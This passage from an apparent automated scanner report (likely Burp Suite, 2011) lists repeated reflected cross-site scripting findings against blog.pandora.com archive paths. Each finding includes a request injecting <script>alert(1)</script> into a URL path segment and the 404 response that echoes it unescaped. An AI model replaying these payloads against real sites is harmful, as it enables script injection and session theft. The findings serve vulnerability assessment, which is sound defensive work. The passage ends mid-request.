Path:	/pandora/archives/florida/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>0d232e15ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ was not found on this server.</p>
...[SNIP]...

3.333. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/florida/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc611<script>alert(1)</script>144240895da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ was not found on this server.</p>
...[SNIP]...

3.334. http://blog.pandora.com/pandora/archives/florida/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/florida/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2e2a<script>alert(1)</script>2320b502118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ was not found on this server.</p>
...[SNIP]...

3.335. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/georgia/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f19a8<script>alert(1)</script>5f361df41b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ was not found on this server.</p>
...[SNIP]...

3.336. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/georgia/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bc1a<script>alert(1)</script>bc0dd599e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ was not found on this server.</p>
...[SNIP]...

3.337. http://blog.pandora.com/pandora/archives/georgia/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/georgia/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b929c<script>alert(1)</script>ae5fbffaaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ was not found on this server.</p>
...[SNIP]...

3.338. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/illinois/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 937ab<script>alert(1)</script>11ad1856e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ was not found on this server.</p>
...[SNIP]...

3.339. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/illinois/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aecb2<script>alert(1)</script>bbd3bee6ead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ was not found on this server.</p>
...[SNIP]...

3.340. http://blog.pandora.com/pandora/archives/illinois/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/illinois/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37ffe<script>alert(1)</script>8413af64462 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ was not found on this server.</p>
...[SNIP]...

3.341. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba293<script>alert(1)</script>35298219914 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html was not found on this server.</p>
...[SNIP]...

3.342. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11e99<script>alert(1)</script>0ea477101ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html was not found on this server.</p>
...[SNIP]...

3.343. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f474<script>alert(1)</script>abd6920173d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html was not found on this server.</p>
...[SNIP]...

3.344. http://blog.pandora.com/pandora/archives/images/map.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/images/map.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4bae<script>alert(1)</script>09286fec01b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b was not found on this server.</p>
...[SNIP]...

3.345. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/indiana/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c18ce<script>alert(1)</script>7ecc04df193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ was not found on this server.</p>
...[SNIP]...

3.346. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/indiana/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8819<script>alert(1)</script>89fc3a9ebb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ was not found on this server.</p>
...[SNIP]...

3.347. http://blog.pandora.com/pandora/archives/indiana/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/indiana/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6554d<script>alert(1)</script>6f5884afdfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ was not found on this server.</p>
...[SNIP]...

3.348. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/louisiana/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd390<script>alert(1)</script>573c7e0b3bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ was not found on this server.</p>
...[SNIP]...

3.349. http://blog.pandora.com/pandora/archives/louisiana/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/louisiana/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4792<script>alert(1)</script>859bb1e33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
